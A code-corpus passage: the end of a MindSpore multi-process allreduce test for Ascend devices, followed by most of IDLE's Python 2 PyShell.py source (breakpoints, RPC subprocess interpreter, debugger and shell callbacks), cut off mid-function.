y1 = Tensor(np.array([[2, 2, 2, 2], [2, 2, 2, 2], [2, 2, 2, 2]])).astype(np.float32)
z = self.add(x, y1)
z = self.all_reduce(z)
y2 = Tensor(np.array([[-16, -16, -16, -16], [-16, -16, -16, -16], [-16, -16, -16, -16]])).astype(np.float32)
out = self.add(z, y2)
out = self.all_reduce(out)
out = self.mul(out, 2)
return out
def train_allreduce_8p(q, device_id, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", device_id=device_id)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=False,
device_num=device_num)
net = AllReduceNet()
input_x = np.ones([3, 4]).astype(np.float32)
output = net(Tensor(input_x, mstype.float32))
q.put(output)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_pynative_hccl_allreduce_8p():
device_num = 8
process = []
q = Queue()
for i in range(device_num):
device_id = i
process.append(Process(target=train_allreduce_8p, args=(q, device_id, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
# check result
for i in range(device_num):
expect_output = [[256, 256, 256, 256], [256, 256, 256, 256], [256, 256, 256, 256]]
output = Tensor(q.get())
assert np.allclose(output.asnumpy(), expect_output)
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
|
PyShell.py
|
#! /usr/bin/env python
from __future__ import print_function
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import io
import linecache
from code import InteractiveInterpreter
from platform import python_version, system
try:
from Tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
from idlelib import IOBinding
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
import warnings
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way."""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n" % (category.__name__, message)
return s
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, IOError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath,"r") as old_file:
lines = old_file.readlines()
except IOError:
lines = []
try:
with open(self.breakpointPath,"w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except IOError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec", dont_inherit=True)
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, unicode) and IOBinding.encoding != 'utf-8':
try:
source = '# -*- coding: %s -*-\n%s' % (
IOBinding.encoding,
source.encode(IOBinding.encoding))
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
